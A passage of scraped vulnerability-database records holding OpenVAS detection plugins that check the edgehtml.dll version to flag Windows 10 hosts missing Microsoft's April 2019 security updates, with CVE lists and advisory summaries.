"CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493470", "modified": "2019-12-20T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815024", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493470)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815024\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2019-0685\", \"CVE-2019-0688\", \"CVE-2019-0730\", \"CVE-2019-0848\",\n \"CVE-2019-0849\", \"CVE-2019-0851\", \"CVE-2019-0731\", \"CVE-2019-0732\",\n \"CVE-2019-0735\", \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0739\",\n \"CVE-2019-0752\", \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0859\",\n \"CVE-2019-0860\", \"CVE-2019-0861\", \"CVE-2019-0862\", \"CVE-2019-0790\",\n \"CVE-2019-0791\", \"CVE-2019-0877\", \"CVE-2019-0879\", \"CVE-2019-0792\",\n \"CVE-2019-0793\", \"CVE-2019-0794\", \"CVE-2019-0795\", \"CVE-2019-0796\",\n \"CVE-2019-0806\", \"CVE-2019-0810\", \"CVE-2019-0812\", \"CVE-2019-0814\",\n \"CVE-2019-0829\", \"CVE-2019-0835\", \"CVE-2019-0836\", \"CVE-2019-0838\",\n \"CVE-2019-0839\", \"CVE-2019-0842\", \"CVE-2019-0844\", \"CVE-2019-0845\",\n \"CVE-2019-0846\", \"CVE-2019-0847\", \"CVE-2019-0802\", \"CVE-2019-0803\",\n \"CVE-2019-0805\", \"CVE-2019-0671\", \"CVE-2019-0673\", \"CVE-2019-0674\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 10:03:26 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493470)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493470\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - The IOleCvt interface improperly renders ASP webpage content.\n\n - The scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows improperly handles calls to the LUAFV driver.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle\n objects in memory.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - OLE automation improperly handles objects in memory.\n\n - Windows Task Scheduler improperly discloses credentials to Windows Credential\n Manager.\n\n - Terminal Services component improperly discloses the contents of its memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The win32k component improperly provides kernel information.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Microsoft browsers do not properly validate input under specific conditions.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, disclose sensitive information, bypass security\n restrictions and compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493470\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2905\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2905\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T16:27:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0837", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0841", "CVE-2019-0859", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493474", "modified": "2020-06-04T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815022", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815022", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493474)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815022\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0685\", \"CVE-2019-0688\", \"CVE-2019-0730\", \"CVE-2019-0848\",\n \"CVE-2019-0849\", \"CVE-2019-0731\", \"CVE-2019-0732\", \"CVE-2019-0735\",\n \"CVE-2019-0851\", \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0739\",\n \"CVE-2019-0752\", \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0859\",\n \"CVE-2019-0860\", \"CVE-2019-0861\", \"CVE-2019-0862\", \"CVE-2019-0790\",\n \"CVE-2019-0791\", \"CVE-2019-0877\", \"CVE-2019-0879\", \"CVE-2019-0792\",\n \"CVE-2019-0793\", \"CVE-2019-0794\", \"CVE-2019-0795\", \"CVE-2019-0796\",\n \"CVE-2019-0806\", \"CVE-2019-0810\", \"CVE-2019-0812\", \"CVE-2019-0814\",\n \"CVE-2019-0829\", \"CVE-2019-0835\", \"CVE-2019-0836\", \"CVE-2019-0837\",\n \"CVE-2019-0838\", \"CVE-2019-0839\", \"CVE-2019-0841\", \"CVE-2019-0842\",\n \"CVE-2019-0844\", \"CVE-2019-0845\", \"CVE-2019-0846\", \"CVE-2019-0847\",\n \"CVE-2019-0802\", \"CVE-2019-0803\", \"CVE-2019-0805\", \"CVE-2019-0671\",\n \"CVE-2019-0673\", \"CVE-2019-0674\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 09:36:16 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493474)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493474\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - The IOleCvt interface improperly renders ASP webpage content.\n\n - The scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows improperly handles calls to the LUAFV driver.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle\n objects in memory.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - OLE automation improperly handles objects in memory.\n\n - Windows Task Scheduler improperly discloses credentials to Windows Credential\n Manager.\n\n - Terminal Services component improperly discloses the contents of its memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The win32k component improperly provides kernel information.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Microsoft browsers do not properly validate input under specific conditions.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - Windows DirectX improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to escalate privileges, run arbitrary code, disclose sensitive information,\n bypass security restrictions and compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493474\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1746\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1746\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T16:27:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0786", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0841", "CVE-2019-0859", "CVE-2019-0840", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0833", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493509", "modified": "2020-06-04T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815019", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815019", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493509)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815019\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0685\", \"CVE-2019-0688\", \"CVE-2019-0730\", \"CVE-2019-0848\",\n \"CVE-2019-0849\", \"CVE-2019-0731\", \"CVE-2019-0732\", \"CVE-2019-0851\",\n \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0735\", \"CVE-2019-0739\",\n \"CVE-2019-0752\", \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0859\",\n \"CVE-2019-0860\", \"CVE-2019-0861\", \"CVE-2019-0862\", \"CVE-2019-0786\",\n \"CVE-2019-0790\", \"CVE-2019-0791\", \"CVE-2019-0877\", \"CVE-2019-0879\",\n \"CVE-2019-0792\", \"CVE-2019-0793\", \"CVE-2019-0794\", \"CVE-2019-0795\",\n \"CVE-2019-0796\", \"CVE-2019-0805\", \"CVE-2019-0806\", \"CVE-2019-0810\",\n \"CVE-2019-0812\", \"CVE-2019-0814\", \"CVE-2019-0829\", \"CVE-2019-0833\",\n \"CVE-2019-0835\", \"CVE-2019-0836\", \"CVE-2019-0838\", \"CVE-2019-0839\",\n \"CVE-2019-0840\", \"CVE-2019-0841\", \"CVE-2019-0842\", \"CVE-2019-0844\",\n \"CVE-2019-0845\", \"CVE-2019-0846\", \"CVE-2019-0847\", \"CVE-2019-0802\",\n \"CVE-2019-0803\", \"CVE-2019-0671\", \"CVE-2019-0673\", \"CVE-2019-0674\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 08:56:15 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493509)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493509\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Windows kernel improperly handles objects in memory.\n\n - The IOleCvt interface improperly renders ASP webpage content.\n\n - The scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows improperly handles calls to the LUAFV driver.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle\n objects in memory.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - OLE automation improperly handles objects in memory.\n\n - Windows Task Scheduler improperly discloses credentials to Windows Credential\n Manager.\n\n - Terminal Services component improperly discloses the contents of its memory.\n\n - The win32k component improperly provides kernel information.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - Microsoft Edge improperly handles objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in the\n memory.\n\n - Microsoft browsers do not properly validate input under specific conditions.\n\n - An error in the Microsoft Server Message Block (SMB) Server when an attacker\n with valid credentials attempts to open a specially crafted file over the SMB\n protocol on the same machine.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to escalate privileges, run arbitrary code, disclose sensitive information,\n bypass security restrictions and compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1809 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1809 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493509\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17763.0\", test_version2:\"11.0.17763.436\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17763.0 - 11.0.17763.436\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T16:27:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0837", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0786", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0841", "CVE-2019-0694", "CVE-2019-0859", "CVE-2019-0840", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493441", "modified": "2020-06-04T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815021", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493441)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815021\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0685\", \"CVE-2019-0688\", \"CVE-2019-0730\", \"CVE-2019-0848\",\n \"CVE-2019-0849\", \"CVE-2019-0731\", \"CVE-2019-0732\", \"CVE-2019-0851\",\n \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0735\", \"CVE-2019-0739\",\n \"CVE-2019-0752\", \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0859\",\n \"CVE-2019-0860\", \"CVE-2019-0861\", \"CVE-2019-0862\", \"CVE-2019-0786\",\n \"CVE-2019-0790\", \"CVE-2019-0791\", \"CVE-2019-0877\", \"CVE-2019-0879\",\n \"CVE-2019-0792\", \"CVE-2019-0793\", \"CVE-2019-0794\", \"CVE-2019-0795\",\n \"CVE-2019-0796\", \"CVE-2019-0805\", \"CVE-2019-0806\", \"CVE-2019-0810\",\n \"CVE-2019-0812\", \"CVE-2019-0814\", \"CVE-2019-0829\", \"CVE-2019-0835\",\n \"CVE-2019-0836\", \"CVE-2019-0837\", \"CVE-2019-0838\", \"CVE-2019-0839\",\n \"CVE-2019-0840\", \"CVE-2019-0841\", \"CVE-2019-0842\", \"CVE-2019-0844\",\n \"CVE-2019-0845\", \"CVE-2019-0846\", \"CVE-2019-0847\", \"CVE-2019-0802\",\n \"CVE-2019-0803\", \"CVE-2019-0671\", \"CVE-2019-0673\", \"CVE-2019-0674\",\n \"CVE-2019-0694\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 09:28:30 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493441)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493441\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Windows kernel improperly handles objects in memory.\n\n - The IOleCvt interface improperly renders ASP webpage content.\n\n - The scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows improperly handles calls to the LUAFV driver.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle\n objects in memory.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - OLE automation improperly handles objects in memory.\n\n - Windows Task Scheduler improperly discloses credentials to Windows Credential\n Manager.\n\n - Terminal Services component improperly discloses the contents of its memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The win32k component improperly provides kernel information.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Microsoft browsers do not properly validate input under specific conditions.\n\n - An error in the Microsoft Server Message Block (SMB) Server when an attacker\n with valid credentials attempts to open a specially crafted file over the SMB\n protocol on the same machine.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - Windows DirectX improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to escalate privileges, run arbitrary code, disclose sensitive information,\n bypass security restrictions and compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493441\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.1086\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.1086\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T16:27:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2017-5753", "CVE-2019-0848", "CVE-2017-5754", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0837", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0786", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0841", "CVE-2017-5715", "CVE-2019-0694", "CVE-2019-0859", "CVE-2019-0840", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493464", "modified": "2020-06-04T00:00:00", "published": 